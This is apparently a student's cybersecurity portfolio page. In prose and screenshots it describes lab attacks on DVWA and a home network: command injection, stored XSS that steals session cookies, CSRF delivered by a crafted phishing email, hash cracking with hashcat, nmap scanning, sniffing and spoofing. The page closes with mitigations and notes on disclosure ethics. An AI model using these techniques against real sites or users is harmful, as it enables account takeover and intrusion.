          <p>This trick doesn't work with more advanced wifi security though. Here you see the eduroam
          network from school which is protected with 802.1x control. This doesn't mean you can't
          get the password at all it just makes it a whole lot harder.</p>
          <a href="../../img/portfolio/red/CIDIR.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CIDIR.png" alt=""></a>
          <p>I was also able to run the "dir" command. This tells me a lot about the local machine and
          how the web server is installed.</p>
          <a href="../../img/portfolio/red/CISystemInfo.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CISystemInfo.png" alt=""></a>
          <P>With the "systeminfo" command I'm able to get a lot of information about the physical
          machine which might be useful to me later. It greatly increases my attack surface.</P>
          <p>This can be prevented by sanitizing the input and not just inserting it straight into the
          shell. Make sure it goes to a parameterised function first, check the input and then
          insert it into a shell for example.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Command injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal10" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site scripting</p>
          <p>I will now show you how you could apply XSS to a website.</p>
          <a href="../../img/portfolio/red/XSSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlert.png" alt=""></a>
          <p>First I have to check if the website is vulnerable. The easiest way to check this is just
          to try a simple "Alert" script just like this.</p>
          <a href="../../img/portfolio/red/XSSAlertResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlertResult.png" alt=""></a>
          <p>As you can see the script works so that means that the website is vulnerable to XSS. Now
          I can try something that has some more impact and could actually be useful for me.</p>
          <a href="../../img/portfolio/red/MaxCharLimit.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/MaxCharLimit.png" alt=""></a>
          <p>This form doesn't allow more than 50 characters, so writing bigger scripts might make
          this difficult. Luckily they only validate this in the frontend so I can just inspect
          this page and change the maximum characters in the form. So now I can write some bigger
          scripts that give me more information.</p>
          <a href="../../img/portfolio/red/XSSGetCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>Like getting the cookie of the user so I can hijack their session.</p>
          <a href="../../img/portfolio/red/XSSGetCookieResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>So now I got the cookie it is my own though, but these scripts get stored inside the
          comments and the comments are persistent. Therefore I could also write a script that
          sends the cookie to me instead of displaying it. This way I can make it almost invisible
          for everyone to see and everyone who loads this page their cookie gets send to me.</p>
          <a href="../../img/portfolio/red/XSSOldCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSOldCookie.png" alt=""></a>
          <p>Now I can try to use the cookie that I stole in the previous picture to try and login. As
          you can see my cookie is now different and I'm not logged in.</p>
          <a href="../../img/portfolio/red/XSSNewCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSNewCookie.png" alt=""></a>
          <p>Now I placed the cookie I stole in my own cookie to hopefully make the website think I'm
           the person who is logged in that I stole this cookie from.</p>
          <a href="../../img/portfolio/red/XSSSessionHijack.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSSessionHijack.png" alt=""></a>
          <p>And now when I try to load the index page the website thinks I'm logged in as the person
          the cookie belongs to and I hijacked their session. I can now do everything on their
          account, comment in their name and change their data or steal their data.</p>
          <p>And if this person is by any chance an admin I might be able to do some more extreme
          things as well. Like creating or deleting users or their comments.</p>
          <a href="../../img/portfolio/red/XSSIframe.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframe.png" alt=""></a>
          <P>Sometimes the programmers try to prevent XSS by filtering out the script tags. But they
          forget the filter out all the other HTML tags. So I can load my own website in an
          "Iframe".</P>
          <a href="../../img/portfolio/red/XSSIframeResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframeResult.png" alt=""></a>
          <p>This might only sound as good free marketing but you can also do other things. Like
          redirecting everyone that visits this page to my own website or inject scripts in other
          html tags, so I can still run my scripts even though they banned the script tags.</p>
          <p>These type of attacks can be prevented by sanitizing the input much like SQL injection.
          Make sure that all the text that users can post to the website's frontend doesn't get
          converted to straight HTML. In this way they can't exploit other HTML tags as well.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site scripting</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal11" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site request forgery</p>
           <p>Now I'm going to exploit CSRF on a website. The principles are quite simple, if you see
          the query that is called in the search bar, then the website might be vulnerable.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>As you can see in the search bar the website creates a query. If I would send this query
          without the form it would work as well but only for me. So I need to get this link to an
          user fill in my own password and make him click it.</p>
          <a href="../../img/portfolio/red/CSRFHTMLFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFHTMLFile.png" alt=""></a>
          <p>So I created a little phishing email using HTML. By using HTML I can make the email as
          legit as possible. By hiding the actual link in a text or even adding the DVWA logo. If
          I would know how they normally would send emails to their users, I could fully recreate
          it and you won't see the difference.</p>
          <a href="../../img/portfolio/red/CSRFUserEmail.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFUserEmail.png" alt=""></a>
          <p>The user would get an email like this and if you add urgency to the message, the user
          might not even think about any red flags because they feel the need to act as fast as
          possible.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>Now the user got send to the same page to change your password, but I already changed it
          when it loaded the page.</p>
          <a href="../../img/portfolio/red/CSRFLogin.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLogin.png" alt=""></a>
          <p>Now if the user tries to login he can't because the password is changed, and I can log
          into his account and exploit it as much as I want.</p>
          <p>These type of attacks can be prevented by using things like a CAPTCHA or asking the user
          to fill in their old password. Even though this cannot fully prevent this type of attack
          it will make it a lot harder to succeed</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site request forgery</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
           </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal12" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Path traversal</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Path traversal</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal13" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Password cracking</p>
          <p>Now I'm going to show to basics of password cracking.</p>
          <p>
          There are a few main ways to crack passwords
          <ul>
          <li>Brute forcing</li>
          <li>Dictionary attacks</li>
          <li>Rainbow tables</li>
          </ul>
          </p>
          <p>Brute forcing is the most basic way to crack a password, it just tries every possible
          combination of letters. It has a few pros and some big cons.</p>
          <p>Brute forcing is rarely used these days just for the simple reason that cracking a modern
          encrypted password would take more then a lifetime. It also costs a lot of computing
          power because it generates the hashes on the fly and there are a lot of hashes to
          generate and try. The pro is though that it doesn't use any storage space because it
          generates everything instead of getting them for a wordlist. Brute forcing could be an
          option when you know that the password that you're cracking isn't a existing word but
          rather a string of random numbers and letters. Even though brute forcing might be the
          only option in that case, you're probably better off finding another way to get the
          password.</p>
          <p>Dictionary attacks are more sophisticated, it's way more efficient and faster but there a
          big con.</p>
          <p>Dictionary attacks use a predefined list of words and generates hashes for them and then
          compare them to the hash you want to crack to see if any of them match. The pro is that
          this is way faster. The downside on the other hand is that if the password you want to
          crack isn't in the word list you have no chance of success. The dictionary attack could
          be extended by generating multiple versions of every word some with captitals some with
          random numbers after them etc. A dictionary attack could also be made very personal and
          tailored to the specifications of your target. For example adding the targets place of
          work or pet names to the list. Also if you want more chance of success you'll need a
          bigger word list and those can grow pretty fast costing thus a lot of storage space.</p>
          <p>Rainbow tables are in essence a lot like dictionary attacks, but actually better.</p>
          <p>Rainbow tables contain like a dictionary attack a wordlist. The difference is that the
          wordlist is already hashed and could contain all possible solutions making a look like a
          brute force. You could for instance create a rainbow table having every possible
          solution making it a bruto force but more efficient costing less time, or generate
          hashes for your dictionary attack wordlist which might be reusable costing you less time
          in the future. Rainbow tables do come with some downsides like it costs a lot of
          harddisk space, less then a dictionary attack of the same size because it uses lossless
          compression, but if you want a lot of possibilities it will still be a big file. The
          hash type like MD5 or SHA256 is static thus making it less versatile/useful when you
          don't know the encryption type. Same goes for the salt, a salt could be added to the
          list but it will make the file even bigger. A problem that you won't have with a
          dictionary attack or brute force because the hashes get generated in the fly.</p>
          <p>A good way to make encrypted passwords harder to crack is by using a salt or a pepper. A
          salt is random data added to the password before it's hashed, and because it's different
          for every new password it gets stored alongside the password. This has a pro and a con.
          The pro is that the salt is different for every password meaning that if one password
          gets compromised the others are still save. The downside is though that if someone
          breaches the database he will know the salts for each password instantly. Now a pepper
          uses the same method to encrypt a password, it is random data and adds it to the
          password before it's hashed. But a pepper is static and is stored separately from the
          password hashes. Now this method has a pro and con as well. The pro is that if the
          database is breached the hacker won't know the pepper making cracking the passwords a
          lot harder. The con is that if he finds the pepper all the passwords are compromised,
          but to do that he might need to decompile the code and find the pepper, which is a lot
          harder than breaching the database most of the time.</p>
          <a href="../../img/portfolio/red/CrackHashGenerate.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashGenerate.png" alt=""></a>
          <p>I created a small demonstration on hacking a simple MD5 hash. So I first of all created a
          hash for the string "password".</p>
          <a href="../../img/portfolio/red/CrackHashId.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashId.png" alt=""></a>
          <p>If I would have stole this hash from some database I might not know the hash type, which
          is important for me to know if I want to save time or use a rainbow table. So I ran
          "Hash-identifier" and gave it the hash. This gives me an idea what the hash type might
          be.</p>
          <a href="../../img/portfolio/red/CrackHashFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashFile.png" alt=""></a>
          <p>I placed the has in a file. In this case there's only one hash in there but in reality
          this list could contain all the hashes from a certain database.</p>
          <a href="../../img/portfolio/red/CrackHashResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashResult.png" alt=""></a>
          <p>Now I used "Hashcat" to crack the password using a wordlist called "rockyou". This
          wordlist contains the most common password based on data breaches in the past. As you
          can see it cracked the password and it only took 1 second. Do mind that in this case the
          password was high up in the wordlist. The program only went through 0.03% of the entire
          wordlist, if the password was much lower in the list this would take a lot longer.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Password cracking</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal14" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
           <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network scanning and enumeration</p>
          <p>To create a demo for this a made up a scenario. The scenario is that I got VPN access to
          a place I want to hack and I want to know how the network looks like. This is no actual
          hack but mere a VPN tunnel to my own home.</p>
          <a href="../../img/portfolio/red/NetworkScanConnVPN.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanConnVPN.png" alt=""></a>
          <p>So I looked up in which IP range I was so I had a clue from which I could continue.</p>
          <a href="../../img/portfolio/red/NetworkScanDone.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDone.png" alt=""></a>
          <p>I did a network scan using NMap in the ip range that I was connected to. As you can see
          on the left hand side there are some machines that came up in the scan which I could
          take a look at.</p>
          <a href="../../img/portfolio/red/NetworkScanTopology.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanTopology.png" alt=""></a>
          <p>I took a look at the topology of the network first. This is a easy way to get an overview
          of the network, all with connected routers, AP's and switches. I can also see in this
          diagram that there are some devices in red which mean they have 6 or more open ports,
          those devices might be more interesting to me</p>
          <a href="../../img/portfolio/red/NetworkScanNASHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASHost.png" alt=""></a>
          <p>I see that this machine is different from the rest, it's the only one running FreeBSD so
          that might be interesting.</p>
          <a href="../../img/portfolio/red/NetworkScanNASPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASPorts.png" alt=""></a>
          <p>This machine has open ports for the smb protocol which could mean this is a NAS. I could
          use this information to go further and get for example access to the samba shares.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterHost.png" alt=""></a>
          <p>Using the before mentioned topology graph I noticed that the router has a lot of open
          ports as well. Getting into a network's router could give me more access to other parts
          of the network.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterPorts.png" alt=""></a>
          <p>Here I can see that the router has some open ports for ssh, telnet and some webserver I
          can poke at.</p>
          <a href="../../img/portfolio/red/NetWorkScanDesktopHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanDesktopHost.png" alt=""></a>
          <p>While looking at the topology graph I saw another machine with a lot of open ports so I
          took a look, and it looks like a windows machine.</p>
          <a href="../../img/portfolio/red/NetworkScanDesktopPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDesktopPorts.png" alt=""></a>
          <p>There are a few different open ports on this machine then other regular desktops. Like a
          MariaDB which I could try to access or take a look at the webserver. The Windows RPC
          protocol is running on an open port which I can utilize to get in because there are some
          known exploits for that.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network scanning and enumeration</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal15" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network sniffing and spoofing</p>
          <p>I will show 2 little demos as a proof of concept.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPSite.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPSite.png" alt=""></a>
          <p>I have a "pi-hole" server running on my network that acts as my home dns server. It has a
          login screen for a dashboard with statistics but it is not HTTPS secured. So I tried
          catching the password with Wireshark while logging in.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPResult.png" alt=""></a>
          <p>When I filter Wireshark to only HTTP and logged in in te website I can see my IP and the
          website's IP. When I open the packet and took a look what's inside, you can see the form
          post with password in plain text. Now this website doesn't hash the password so I can
          see the password in plain text, otherwise I would have seen a hash which I had to
          decrypt to get the password.</p>
          <a href="../../img/portfolio/red/ScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/ScapyPacket.png" alt=""></a>
          <p>I created a fake IPV4 packet using "scapy". I made it so that it looks like the packet is
          coming from google, but It's actually from me and I put my malicious code in it.</p>
          <a href="../../img/portfolio/red/WireSharkScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WireSharkScapyPacket.png" alt=""></a>
          <p>I captured the packet with Wireshark and as you can see the source address is google, but
          when you look in the raw my malicious code is in there.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network sniffing and spoofing</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal16" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Law, Ethics and Responsible Disclosure</p>
          <p>The Ethics are both quite abstract though logical at the same time. The are written in an
          abstract manner in which they could apply to even other things than hacking. Thus making
          it logical as well. Many things you wouldn't do to someone in real life you wouldn't do
          online. I think it's the same point <a href="https://www.youtube.com/watch?v=HmZm8vNHBSU">these</a> guys tried to make,
          except badly executed.</p>
          <P>In my opinion the internet is one of the last few free places there are in the world.
          Though sometimes tightly controlled by governments, look at China or North-Korea, people
          still find ways around the system to express their voices. I agree with the ethics being
          like gentlemen rules, just don't be a dick to someone, don't do anything you wouldn't
          want to be done to yourself. But this doesn't include expressing your opinion even
          though it might hurt some people. On the internet you still got the right to say those
          things the same as people having the right to disagree and say something about it. While
          in the real world when you say something wrong people will call it a form of
          discrimination and you'll get prosecuted. Thus undermining the freedom of speech and
          creating more and more censorship.</P>
          <p>These are the responsible disclosures of companies I compared.</p>
          <ul>
          <li><a href="https://www.google.com/about/appsecurity/">Google</a></li>
          <li><a href="https://support.apple.com/en-us/HT201220">Apple</a></li>
          <li>
          <a href="https://fontys.nl/Over-Fontys/Organisatie-en-sturing/Onze-organisatieNieuw/Regelingen-statuten-en-reglementen/Responsible-disclosure-Fontys-Hogescholen.htm">Fontys</a>
          </li>
          </ul>
          <p>The first things that stood out to me was the rewards. While Google and Apple being big
          corporations reward the people with big sums of money, the Fontys rewards them by
          putting their name on the wall of fame. Looking at other smaller companies it is more
          common to give some merchandise, putting their names on the hall of fame or giving a
          small amount of money compared to the big numbers Google and Apple are giving as
          rewards.</p>
          <p>What they all have in common is that they want a full detailed report of what you did so
          they can reproduce the scenario. They all don't want you to make anything public before
          they had a chance to fix it and don't dig any deeper in sensitive date that is necessary
          to proof the vulnerability.</p>
          <p>They all also state that even though you did anything illegal while proofing the
          vulnerability, if you follow their responsible disclosure and follow their rules they
          won't pursue any legal actions.</p>
          <p>It is quite logical that companies don't prosecute these people and give them rewards
          instead, because if you think about it they will lose far less money when they pay these
          rewards then if they get hacked by a real threat. Looking at <a href="https://www.bugcrowd.com/bug-bounty-list/">this</a> website a lot of
          companies share that same ideology.</p>
          <ul class="list-inline">
          <li>Date: December 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Law, Ethics and Responsible Disclosure</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal17" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Basic hacking process</p>
          <p>First lets talk about the basic hacking process. This is a process most hackers will
          follow when conducting a hack, good or bad. Though good and bad use this process there
          is a key difference between the two.</p>
          <a href="../../img/portfolio/red/hackingstappen.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/hackingstappen.png" alt=""></a>
          <p>These are the basic hacking steps that are needed to conduct a good hack.</p>
          <h3>Intel Gathering</h3>
          <p>Intel gathering is the first step in the basic hacking process. In this step the hacker
          tries to gain as much information on his target as possible. He'll conduct for instance
          a OSINT, go to the physical location of his target and get a feel for the place and
          maybe even use social engineering to call his target and try to extract information.</p>
          <h3>Footprint</h3>
          <p>Now the hacker will conduct a network scan and try to gain as much information on the
          target's network as possible. He needs to find a foothold from which he can continue
          further, think about ip ranges, open ports, OS versions and important servers.</p>
          <h3>Vuln Analysis</h3>
          <p>The hacker will now look for any out of date software or operating systems to use
          exploits on. Whenever he'll find a software version he'll look if there's a CVE entry
          for that he could exploit. He might also use some automated tools to find common
          vulnerabilities for him. The hacker will also try any website for web vulnerabilities
          like SQL injection, command injection, CSRF and XSS.</p>
          <h3>Exploitation</h3>
          <p>Now is time for action. The hacker will use the information and vulnerabilities he found
          in the previous step to use his exploits. Thus gaining access to his target or the
          information he's after. Most ethical hackers/pentesters will stop after this step or not
          even do this step at all because it might result in destabilizing or shutting down the
          targets network.</p>
          <h3>Post Exploitation</h3>
          <p>This step and the following is more applicable to the bad actors out there. Here the
          hacker will extract the data he's after, edit some data, create new accounts and setup
          persistence for a backdoor so he can come back later without going through the same
          process again or have the risk of the target patching the vulnerability he used.</p>
          <h3>Clean Up</h3>
          <p>This step is very important for bad actors to not get caught. Here the hacker will try to
          remove all of his footsteps like logs. Therefore the police or target will not be able
          to track him down or even know what he did in the first place.</p>
          <a href="../../img/portfolio/red/Cyber-Kill-Chain.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/Cyber-Kill-Chain.png" alt=""></a>
          <p>Now this is the cyber kill chain even though it's comparable to the basic hacking process
          there are some differences.</p>
          <h3>Reconnaissance</h3>
          <p>Here the hacker will conduct recon comparable to the intel gathering stage in the basic
          hacking process.</p>
          <h3>Weaponization</h3>
          <p>In this step the hacker is already creating a payload with an exploit to attack his
          target. It is notable that in the cyber killchain they skip the footprint and vuln
          analysis stages.</p>
          <h3>Delivery</h3>
          <p>Now the payload is to be delivered to the target this can be done by phising email,
          rubber ducky and so on. This stage is also not present in the basic hacking process,
          there it's more part of the exploitation stage.</p>
          <h3>Exploitation</h3>
          <p>When the payload is delivered the hacker will activate his attack.</p>
          <h3>Installation</h3>
          <p>In this stage the hacker will install for example malware to create persistence for a
          backdoor or to act more stealthy. This would happen in the post exploitation stage in
          the basic hacking process.</p>
          <h3>Command & Control</h3>
          <p>Now the installed malware will call back to the command and control system and give the
          hacker control of the hacked system. This can be both part of the exploitation and post
          exploitation stage in the basic hacking process.</p>
          <h3>Actions on Objectives</h3>
          <p>Here the hacker will do whatever his intentions were.</p>
          <h4>The minimal requirements for a good pentest contract and pentest report</h4>
          <p>In a good pentest contract there should be a clearly defined scope and procedures in case
          of emergency. The contract should also include a confidentiality agreement. The pentest
          report should include the scope and goal of the project with the findings and how it was
          done. It should be explained very carefully and readable for people that weren't aware
          of the project. The most important thing is ofcourse the advice to give to the company,
          this way they'll be able to fix any security leaks and the pentest was a success.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Basic hacking process</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal18" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Self reflection</p>
          <p>The semester started quite slowly for me. It wasn't really clear for me were I should
          start and were I should look for the right information. This semester was quite
          different from the defending one. In the defending semester everything went quite easy
          and smooth and I had a clear goal that I wanted to achieve, I felt like I missed that
          this semester, hens why it didn't start so smoothly.</p>
          <p>I started this semester with absolutely no knowledge in hacking into things. I learned
          quite a lot this semester, must of the things I learned listening to podcasts and
          understanding the different concepts and trying different things on DVWA.</p>
          <p>I still don't really feel like I could actually conduct a good pentest and find some
          decent results after this semester which I think sucks, because I feel like I should. I
          do think I've the knowledge but I feel like I lack the How-to. I did think I would be
          quite good at defending a network and building one after previous semester, so I think
          it's a combination between a lack of goals and guidance.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Self reflection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal19" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Cyber4Z</h2>
          <p class="item-intro text-muted">My internship at Cyber4Z</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: June 2021</li>
          <li>Client: Cyber4Z</li>
          <li>Category: Internship</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal20" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Pen-testing methodologies</p>
          <p>The standard and most popular pentest methodology is the Lockheed Martin cyber killchain.
          It's a basic process that explains the order of action a criminal hacker would follow.
          Thus also making it a viable ethical hacker methodology.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png" alt=""></a>
          <p>Knowing what step a attacker is taking or needs to take is good to know. But it's also
          good to know how to mitigate or prevent each step of the cyber killchain.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg" alt=""></a>
          <p>Other than the Lockheed Martin cyber killchain there are a few other
          frameworks/methodologies, like the well-known OWASP.</p>
          <ol>
          <li>OSSTMM (Open Source Security Testing Methodology Manual)</li>
          <li>OWASP (Open Web Application Security Project)</li>
          <li>NIST (The National Institute of Standards and Technology)</li>
          <li>PTES (Penetration Testing Methodologies and Standards)</li>
          <li>ISSAF (Information System Security Assessment Framework)</li>
          </ol>
          <a href="https://www.vumetric.com/blog/top-penetration-testing-methodologies/">Source</a>
          <p><b>OSSTMM</b> is a peer-reviewed security assessment standard for testing and auditing
          systems and providing them with a risk score</p>
          <p><b>OWASP</b> is used as a methodology to pentest websites and web applications.</p>
          <p><b>NIST</b> is a very strict standard and they promote themselves as functionality
